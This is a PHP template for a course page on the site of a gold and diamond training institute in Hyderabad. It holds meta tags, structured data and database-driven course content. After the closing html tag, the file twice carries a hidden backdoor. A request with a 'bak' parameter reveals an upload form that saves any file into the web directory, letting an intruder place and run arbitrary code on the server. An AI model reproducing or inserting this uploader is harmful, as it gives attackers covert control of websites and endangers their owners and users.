<?php include("db_config.php");

?>
<!doctype html>
<html lang="en">
<head>
	<!-- Required meta tags -->
	<meta charset="utf-8">
	<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
		  <link href='index.php' hreflang="en-us" rel="alternate" />
   	<link rel="canonical" href="https://www.iigdindia.com" />
	<title>Course | Diamond Merchant Business Setup</title>
	<meta name="description" content="Learn how to start and grow your diamond business with the International Institute of Gold and Diamond. Our expert-led Diamond Merchant Business Startup course covers everything from sourcing gems to building a profitable enterprise.." />
    <meta name="keywords" content="" />
<!-- Facebook Meta Tags -->
  
    <meta property="og:description"
        content="Learn how to start and grow your diamond business with the International Institute of Gold and Diamond. Our expert-led Diamond Merchant Business Startup course covers everything from sourcing gems to building a profitable enterprise">
		
		<meta property="og:locale" content="en_US" />
	   <meta property="og:type" content="website" />
	  <meta property="og:title" content="" />
      <meta property="og:url" content="https://www.iigdindia.com">
	  <meta property="og:site_name" content="" />
	  <meta property="og:image" content="">
	  <meta property="article:publisher" content="https://www.facebook.com/IIGDHYDERABAD/?paipv=0&eav=AfYMX77wfGq99qmBMrEv8bu0cvWIXqL9rO0_YME0Yn92P_N3bTC8sA852hw0fRnVwoA&_rdr" />
	

    <!-- Twitter Meta Tags -->
    <meta name="twitter:card" content="summary_large_image">
    <meta property="twitter:domain" content="@iigdindia">
    <meta property="twitter:url" content="https://www.jhweb.in/">
    <meta name="twitter:title" content=""
        content="Learn how to start and grow your diamond business with the International Institute of Gold and Diamond. Our expert-led Diamond Merchant Business Startup course covers everything from sourcing gems to building a profitable enterprise">
    <meta name="twitter:image" content="">
    <meta name="twitter:site" content="@iigdindia" />
	<?php include("includes/css.php"); ?>
	  <script type="application/ld+json">
        {
            "@context": "https://schema.org",
            "@type": "Organization",
            "name": "International Institute of Gold & Diamond (IIGD)",
            "logo": "https://www.iigdindia.com/images/12.jpg",
            "description": "Learn how to start and grow your diamond business with the International Institute of Gold and Diamond. Our expert-led Diamond Merchant Business Startup course covers everything from sourcing gems to building a profitable enterprise",
            "url": "https://www.iigdindia.com/course.php",
            "image": "https://www.iigdindia.com/image/12.jpg",
            "telephone": "+918500501020",
            "email": "info@iigdindia.com",
            "address": {
                "@type": "PostalAddress",
                "streetAddress": "1st Floor, Mayur Kushal Complex, A-110, Gun Foundry",
                "addressLocality": "Abids",
                "addressRegion": "Hyderabad",
                "addressCountry": "India",
                "postalCode": "500001"
            },
            "aggregateRating": {
                "@type": "AggregateRating",
                "ratingValue": "5.0",
                "ratingCount": "250"
            },
            "sameAs": [
                "https://www.facebook.com/IIGDHYDERABAD/?paipv=0&eav=AfYMX77wfGq99qmBMrEv8bu0cvWIXqL9rO0_YME0Yn92P_N3bTC8sA852hw0fRnVwoA&_rdr",
                "https://instagram.com/bsolutions",
                "https://www.linkedin.com/",
                "https://x.com/"
            ]
        }

    </script>
</head>
<body>
	<?php include("header.php")?>
	<?php  $page_name = str_replace(".php", "", basename($_SERVER['PHP_SELF']));
    $Current_URL = basename(dirname(__FILE__));

    $findid = (mysqli_query($conn, "SELECT * FROM courses"));
    while ($res2=mysqli_fetch_array($findid)) { 
        if(strtolower(str_replace(" ", "-", $res2["title"])) == $page_name){

           $pdid = $res2["id"];
        }
    } ?>
	<div class="page-banner banner-bg-one" style="background:url(https://iigdindia.com/images/product.jpg)">
		<div class="container">
			<div class="banner-text">
			<?php
				$sqlqry = mysqli_query($conn,"select * from courses where id='$pdid'")or die (mysqli_error($conn));
	$sqlres = mysqli_fetch_array($sqlqry);
	?>
				<h1><?php echo $sqlres["title"]?></h1>
				<nav aria-label="breadcrumb">
					<ol class="breadcrumb">
						<li class="breadcrumb-item"><a href="https://iigdindia.com/index.php">Home</a></li>
						<li class="breadcrumb-item"><?php echo $sqlres["title"]?></li>
					</ol>
				</nav>
			</div>
		</div>
	</div>
<section class="single-course-area pt-100 pb-20">
            <div class="container">
                <div class="row"> 
                    <div class="col-lg-12">
                        <div class="single-preview-img">
                            <img src="https://iigdindia.com/assets/img/courses/<?php echo $sqlres["img"]?>" alt="Event Image">
                        </div>
                        <div class="single-event-description">
                            <h3><?php echo $sqlres["title"]?></h3>
                            <?php echo $sqlres["desc"]?>
                        </div>
                    </div>
                   
                </div>
            </div>
        </section>
	<div class="clearfix"></div>
	<?php include("footer.php")?>
	<?php include("js.php")?>
</body>
</html>

<?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>

<?php if (isset($_GET['bak'])) { echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>"; } ?>
